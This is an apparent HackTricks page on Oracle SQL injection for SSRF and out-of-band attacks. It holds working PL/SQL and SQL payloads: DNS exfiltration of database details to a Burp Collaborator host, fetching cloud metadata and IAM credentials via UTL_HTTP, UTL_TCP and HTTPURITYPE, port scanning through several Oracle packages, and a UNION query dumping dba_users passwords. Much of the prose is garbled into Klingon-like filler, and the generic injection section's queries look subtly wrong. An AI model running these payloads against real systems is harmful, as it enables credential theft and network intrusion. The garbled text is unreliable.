hacktricks/pentesting-web/sql-injection/oracle-injection.md

Oracle injection

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Serve this post a wayback machine copy of the deleted post from https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/.

SSRF

Oracle vItlh Out of Band HTTP je DNS request vItlhutlh injections vItlh. jatlhpu' vItlhutlh techniques/functions modify vItlhutlh SSRF/XSPA.

Oracle cha'logh qatlh, 'ach vaj 'oH 'ej vItlhutlh commands try instance setup vItlhutlh. Appsecco vItlhpu'wI' 'ej Abhisek Datta, https://github.com/MaksymBilenko/docker-oracle-12c vItlhutlh vItlhutlh instance setup vItlhutlh t2.large AWS Ubuntu machine 'ej Docker.

Docker command 'e' vItlhutlh --network="host" flag Oracle native install mimic network access vItlhutlh, blogpost vItlhutlh.

docker run -d --network="host" quay.io/maksymbilenko/oracle-12c

Oracle packages that support a URL or a Hostname/Port Number specification

Oracle packages vItlhutlh 'ej vItlhutlh 'e' vItlhutlh URL 'ej Hostname/Port Number specification support ghaH. Oracle Database Online Documentation Google search run order find jatlh.

vItlhutlh 'ej vItlhutlh 'e' vItlhutlh URL 'ej Hostname/Port Number specification support ghaH.

site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"

The search returned the following results (not all can be used to perform outbound network)

• DBMS_NETWORK_ACL_ADMIN
• UTL_SMTP
• DBMS_XDB
• DBMS_SCHEDULER
• DBMS_XDB_CONFIG
• DBMS_AQ
• UTL_MAIL
• DBMS_AQELM
• DBMS_NETWORK_ACL_UTILITY
• DBMS_MGD_ID_UTL
• UTL_TCP
• DBMS_MGWADM
• DBMS_STREAMS_ADM
• UTL_HTTP

This crude search obviously skips packages like DBMS_LDAP (which allows passing a hostname and port number) as the documentation page simply points you to a different location. Hence, there may be other Oracle packages that can be abused to make outbound requests that I may have missed.

In any case, let’s take a look at some of the packages that we have discovered and listed above.

DBMS_LDAP.INIT

The DBMS_LDAP package allows for access of data from LDAP servers. The init() function initializes a session with an LDAP server and takes a hostname and port number as an argument.

This function has been documented before to show exfiltration of data over DNS, like below

SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;

DaH jImej hostname je port number jatlhpu' 'ej, vaj jImej vItlhutlh scanner port vay' vItlhutlh.

vaj 'ej vItlhutlh examples:

SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;

ORA-31203: DBMS_LDAP: PL/SQL - Init Failed. jatlh port vItlhutlh. vItlhutlh port vItlhutlhlaHbe'chugh session value.

UTL_SMTP

UTL_SMTP package SMTP protocol yIlo'laHbe'chugh 'e-maIl je. Oracle documentation site example yIlo'laHbe'chugh 'e-maIl yIqaw. jatlh, 'ach, vItlhutlhlaHbe'chugh host je port specification.

crude example vItlhutlhlaHbe'chugh UTL_SMTP.OPEN_CONNECTION function, 2 seconds timeout vItlhutlhlaHbe'chugh.

DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',80,2);
END;

DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
END;

A ORA-29276: transfer timeout shows port is open but no SMTP connection was estabilished while a ORA-29278: SMTP transient error: 421 Service not available shows that the port is closed.

UTL_TCP

The UTL_TCP package and its procedures and functions allow TCP/IP based communication with services. If programmed for a specific service, this package can easily become a way into the network or perform full Server Side Requests as all aspects of a TCP/IP connection can be controlled.

The example on the Oracle documentation site shows how you can use this package to make a raw TCP connection to fetch a web page. We can simply it a little more and use it to make requests to the metadata instance for example or to an arbitrary TCP/IP service.

set serveroutput on size 30000;
SET SERVEROUTPUT ON
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
/

DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;

UTL_HTTP and Web Requests

UTL_HTTP ghItlh web requests

ghItlh UTL_HTTP package jatlh common 'ej widely documented technique Out Band Oracle SQL Injection tutorial tutorial 'e' UTL_HTTP package jatlh. package 'e' defined documentation - The UTL_HTTP package makes Hypertext Transfer Protocol (HTTP) callouts from SQL and PL/SQL. You can use it to access data on the Internet over HTTP.

select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;

Oracle Injection

Oracle Injection is a technique used to exploit vulnerabilities in Oracle databases by injecting malicious SQL queries. This can lead to unauthorized access, data manipulation, and even complete control over the database.

Basic Oracle Injection

In Oracle databases, the UNION operator can be used to combine the results of two or more SELECT statements into a single result set. This can be leveraged to extract sensitive information from the database.

Extracting Data

To extract data from an Oracle database, you can use the following query:

SELECT column_name FROM table_name UNION SELECT NULL FROM dual;

Replace column_name with the name of the column you want to extract data from, and table_name with the name of the table.

Enumerating Tables

To enumerate the tables in an Oracle database, you can use the following query:

SELECT table_name FROM all_tables UNION SELECT NULL FROM dual;

Enumerating Columns

To enumerate the columns in a specific table, you can use the following query:

SELECT column_name FROM all_tab_columns WHERE table_name = 'table_name' UNION SELECT NULL FROM dual;

Replace table_name with the name of the table you want to enumerate columns from.

Extracting Usernames and Passwords

To extract usernames and passwords from an Oracle database, you can use the following query:

SELECT username || ':' || password FROM dba_users UNION SELECT NULL FROM dual;

Performing Port Scanning

You can also use Oracle Injection to perform rudimentary port scanning by leveraging the UTL_TCP package in Oracle. This package allows you to create TCP connections and send/receive data.

To perform port scanning, you can use the following query:

DECLARE
  c utl_tcp.connection;
BEGIN
  c := utl_tcp.open_connection('target_ip', target_port);
  utl_tcp.close_connection(c);
EXCEPTION
  WHEN OTHERS THEN
    NULL;
END;

Replace target_ip with the IP address of the target and target_port with the port number you want to scan.

Keep in mind that port scanning is a potentially intrusive activity and may be illegal or against the terms of service of the target system. Always ensure you have proper authorization before performing any port scanning activities.

select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;

A ORA-12541: TNS:no listener or a TNS:operation timed out is a sign that the TCP port is closed, whereas a ORA-29263: HTTP protocol error or data is a sign that the port is open.

Another package I have used in the past with varied success is the GETCLOB() method of the HTTPURITYPE Oracle abstract type that allows you to interact with a URL and provides support for the HTTP protocol. The GETCLOB() method is used to fetch the GET response from a URL as a CLOB data type.[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.